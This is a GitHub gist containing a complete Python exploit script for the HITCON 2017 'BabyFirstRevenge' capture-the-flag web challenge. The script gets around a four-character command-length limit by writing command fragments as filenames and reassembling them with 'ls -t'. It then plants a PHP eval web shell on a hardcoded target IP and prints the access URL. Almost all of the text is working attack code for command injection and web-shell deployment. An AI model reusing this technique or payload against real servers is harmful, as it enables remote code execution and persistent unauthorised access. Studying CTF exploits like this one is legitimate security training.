Skip to content

Instantly share code, notes, and snippets.

@WangYihang

WangYihang/HITCON-2017-WEB-BabyFirstRevenge.py

Created November 6, 2017 04:12
Show Gist options
  • Save WangYihang/281fda47bbf7c74fd4e0e34bb5c45454 to your computer and use it in GitHub Desktop.
Save WangYihang/281fda47bbf7c74fd4e0e34bb5c45454 to your computer and use it in GitHub Desktop.
Download ZIP
Exploit for HITCON-2017-WEB-BabyFirstRevenge
Raw
HITCON-2017-WEB-BabyFirstRevenge.py
#!/usr/bin/env python
# encoding:utf-8
# Author : WangYihang
# Email : [email protected]
# To solve HITCON-2017-WEB-BabyFirstRevenge
import requests
import hashlib
def get_global_ip():
response = requests.get("http://ip.cn/", headers={"User-Agent": "curl/7.55.1"})
content = response.content
IP = content.split("IP:")[1].split(" ")[0]
return IP
def md5(data):
return hashlib.md5(data).hexdigest()
def reset(host, port):
url = "http://%s:%d/?reset=1" % (host, port)
requests.get(url)
def add_slashes(cmd):
cmd = cmd.replace(".", "\\.")
cmd = cmd.replace("\\", "\\\\")
cmd = cmd.replace("/", "\\/")
cmd = cmd.replace("|", "\\|")
cmd = cmd.replace("&", "\\&")
cmd = cmd.replace("-", "\\-")
cmd = cmd.replace("<", "\\<")
cmd = cmd.replace(">", "\\>")
cmd = cmd.replace("#", "\\#")
cmd = cmd.replace(" ", "\\ ")
cmd = cmd.replace("\t", "\\\t")
cmd = cmd.replace("=", "\\=")
return cmd
def get(url):
print "%s" % (url)
return requests.get(url).content
def exec_cmd(host, port, cmd, max_length):
url = "http://%s:%d/" % (host, port)
print "[+] cmd : %s" % (cmd)
if len(cmd) <= max_length:
return get("http://%s:%d/?cmd=%s" % (host, port, cmd))
cmd = add_slashes(cmd)
print "[+] Full cmd : %s" % (cmd)
every_length = max_length - len(">") - len("\\")
times = len(cmd) / every_length
for i in range(1, times + 1, 1):
index = i * every_length - 1
if cmd[index] == "\\":
cmd = cmd[0:index] + "\\" + cmd[index:]
cmds = []
for i in xrange(times):
every = cmd[every_length * i:every_length * (i+1)]
true_cmd = ">%s\\" % (every)
cmds.append(true_cmd.replace("\\\\", "\\"))
end_cmd = ">%s" % (cmd[times * every_length:])
if len(end_cmd) == 1:
cmds[-1] = cmds[-1][0:-2]
cmds.append(end_cmd)
for i in cmds[::-1]:
target = url + "?cmd=" + i.replace("+", "%2b")
get(target)
def build_ls_t(host, port, shell_script, ls_t_script):
url = "http://%s:%d/?cmd=>ls\\" % (host, port)
get(url)
url = "http://%s:%d/?cmd=>-t\\" % (host, port)
get(url)
url = "http://%s:%d/?cmd=>\\%%20\\" % (host, port)
get(url)
url = "http://%s:%d/?cmd=>\\>%s" % (host, port, shell_script)
get(url)
url = "http://%s:%d/?cmd=ls>>%s" % (host, port, ls_t_script)
get(url)
url = "http://%s:%d/?cmd=ls>>%s" % (host, port, ls_t_script)
get(url)
def shell_exec(host, port, target_command):
url = "http://%s:%d/" % (host, port)
reset(host, port)
shell_script_filename = "a"
ls_t_script_filename = "b"
target_shell_script_filename = "c"
build_ls_t(host, port, shell_script_filename, ls_t_script_filename)
command = "echo %s|base64\t-d>%s" % (target_command.encode("base64").replace("\n", ""), target_shell_script_filename)
print "[+] Command : %s" % (command)
exec_cmd(host, port, command, 4)
exec_cmd(host, port, "sh %s" % (ls_t_script_filename), 4)
exec_cmd(host, port, "sh %s" % (shell_script_filename), 4)
exec_cmd(host, port, "sh %s" % (target_shell_script_filename), 4)
def main():
host = "52.199.204.34"
port = 80
webshell_filename = "c.php"
webshell_password = "c"
command = "echo '<?php eval($_REQUEST[%s]);?>'>%s" % (webshell_password, webshell_filename)
shell_exec(host, port, command)
print "[+] Enjoy your webshell : "
print "http://%s:%d/sandbox/%s/%s?%s=phpinfo();" % (host, port, md5("orange%s" % (get_global_ip())), webshell_filename, webshell_password)
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment